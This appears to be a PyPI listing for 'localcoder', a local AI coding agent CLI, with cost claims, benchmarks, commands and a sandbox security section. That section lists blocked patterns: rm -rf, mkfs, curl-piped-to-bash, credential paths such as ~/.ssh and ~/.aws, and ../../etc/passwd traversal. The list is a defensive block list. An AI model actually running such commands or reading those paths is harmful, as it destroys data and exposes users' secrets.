Local AI coding agent — auto-installs, auto-serves, zero config. Works with Gemma 4, Qwen 3.5, and any model via llama.cpp or Ollama.
Project description
localcoder
The local coding CLI that does the obvious things nobody else does.
pipx install localcoder
I wanted to paste a screenshot into my coding assistant and see it inline. No tool did that locally. So I built one.
Cost: $1.30/month vs $110/month
Running local saves 85-141x compared to cloud APIs:
| Usage | Claude Sonnet | Claude Opus | Local (US) | Local (India) |
|---|---|---|---|---|
| 4h/day | $55/mo | $91/mo | $0.65/mo | $0.29/mo |
| 8h/day | $110/mo | $183/mo | $1.30/mo | $0.58/mo |
| 10h/day | $137/mo | $228/mo | $1.62/mo | $0.72/mo |
Based on: Gemma 4 26B at 47 tok/s, 30% active generation, M4 Pro 30W. Electricity: worldpopulationreview.com. API: anthropic.com.
Annual savings: ~$1,300-$2,700 depending on usage and API choice.
What's Actually Different
| Feature | localcoder | aider | OpenCode | Claude Code |
|---|---|---|---|---|
| Paste image, see it inline | Ctrl+V → shows in terminal | no | no | cloud only |
| Voice input (local) | Ctrl+R → Whisper, no cloud | no | no | no |
| See GPU memory while coding | /gpu → live stats | no | no | no |
| Computer use (screenshot + click) | built-in | no | no | cloud only |
| Free GPU when it's slow | /clean → before/after | no | no | n/a |
| Browse HuggingFace models | built-in model browser | no | no | n/a |
| Works offline | 100% | partial | partial | no |
| Cost | $0.00 | API costs | API costs | $20/mo+ |
Demo
❯ localcoder
localcoder · local AI coding agent · $0.00 forever
┌──────────────────────────────────────────────────┐
│ LOCAL CODER │
└──────────────────────────────────────────────────┘
● Gemma 4 26B Q3_K_XL · llama.cpp · 128K · ● GPU · 47 tok/s
✓ offline · no API keys · no data sent
ctrl+r voice ctrl+v image /gpu stats /clean free /models switch
❯ /gpu
GPU ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 12/16GB 3GB free
Swap 3GB Pressure normal
Model Gemma 4 26B Q3_K_XL GPU ctx 128K footprint 2311MB
Benchmark — M4 Pro 24GB
Real tests, real hardware, no synthetic benchmarks:
| Model | Size | tok/s | Notes |
|---|---|---|---|
| Gemma 4 26B Q3_K_XL | 12.0GB | 47 | Best overall — vision + tool calling |
| Qwen3.5-35B MoE Q2_K_XL | 11.3GB | 46 | Best coding quality |
| Qwen3.5-4B Q4_K_XL | 2.7GB | 46 | Quick tasks |
| Gemma 4 E4B Q4_K_M | 5.0GB | 56 | Fastest — good for 16GB Macs |
Install
# macOS (Apple Silicon)
pipx install localcoder
# First run — auto-detects hardware, shows what fits, starts model
localcoder
Needs llama.cpp or Ollama. First run wizard handles this.
Commands
localcoder # interactive coding
localcoder -p "build a react app" # one-shot
localcoder --yolo # auto-approve tools
While Coding
| Command | What |
|---|---|
Ctrl+V |
Paste + display image from clipboard |
Ctrl+R |
Toggle voice input (local Whisper) |
/gpu |
GPU memory, swap, model status |
/clean |
Free GPU memory with before/after |
/models |
Switch model (includes HuggingFace trending) |
/clear |
Clear conversation |
Also works with Claude Code
Don't want localcoder's agent? Use Claude Code with your local model instead:
pip install localfit
localfit --launch claude --model gemma4-26b
One command: starts model → configures Claude Code → launches with --bare flag.
See localfit for details.
GPU Toolkit (localfit inside)
localcoder --simulate # will this model fit my GPU?
localcoder --fetch unsloth/... # check all quants from HuggingFace
localcoder --bench # benchmark models on YOUR hardware
localcoder --health # GPU health dashboard
localcoder --config opencode # auto-configure OpenCode for local models
localcoder --config aider # auto-configure aider
Also available standalone: pipx install localfit
Hardware
| Mac | RAM | Best Model | Speed |
|---|---|---|---|
| Air M2 | 8 GB | Qwen 3.5 4B | 50 tok/s |
| Air M3 | 16 GB | Gemma 4 E4B | 57 tok/s |
| Pro M4 | 24 GB | Gemma 4 26B Q3_K_XL | 47 tok/s |
License
Apache-2.0
Security
Sandbox mode is ON by default. Protects against destructive model outputs:
| Blocked | Examples |
|---|---|
| Destructive commands | rm -rf, sudo, kill, mkfs |
| Pipe to shell | curl ... | bash, wget ... | sh |
| Protected paths | ~/.ssh, ~/.aws, ~/.env, /etc/ |
| Path traversal | ../../etc/passwd |
| Computer use | Disabled in sandbox |
localcoder # sandboxed (default)
localcoder --yolo # auto-approve but sandbox ON
localcoder --unrestricted # sandbox OFF (shows warning)
Approved tools are remembered across sessions (~/.localcoder/approved_tools.json).
Tests
pip install pytest
pytest tests/ -v # 19 tests
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file localcoder-0.2.1.tar.gz.
File metadata
- Download URL: localcoder-0.2.1.tar.gz
- Upload date:
- Size: 114.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.14.2
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
af0a7ef5e9b28c5165ffa2d9ab9b523a686f33a00329448ca2b53642dcae4c3a
|
|
| MD5 |
6d2bb279d9ae79ec1a0067caadb29abb
|
|
| BLAKE2b-256 |
dc315dd0a0486c2f67c1c60a50f83ba2f0600abc3847b72485dd71f7c9cf7590
|
File details
Details for the file localcoder-0.2.1-py3-none-any.whl.
File metadata
- Download URL: localcoder-0.2.1-py3-none-any.whl
- Upload date:
- Size: 105.5 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.14.2
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
65ed7aa298072ecb33398a07af7e0d7b32d5c5825da0c241cdd58322e7103550
|
|
| MD5 |
9722d212268b73cdc995852778be368a
|
|
| BLAKE2b-256 |
c269eb9fb273be9f66eaf5e7b1f4bf18878d816b48d9e37834c97073678bee8b
|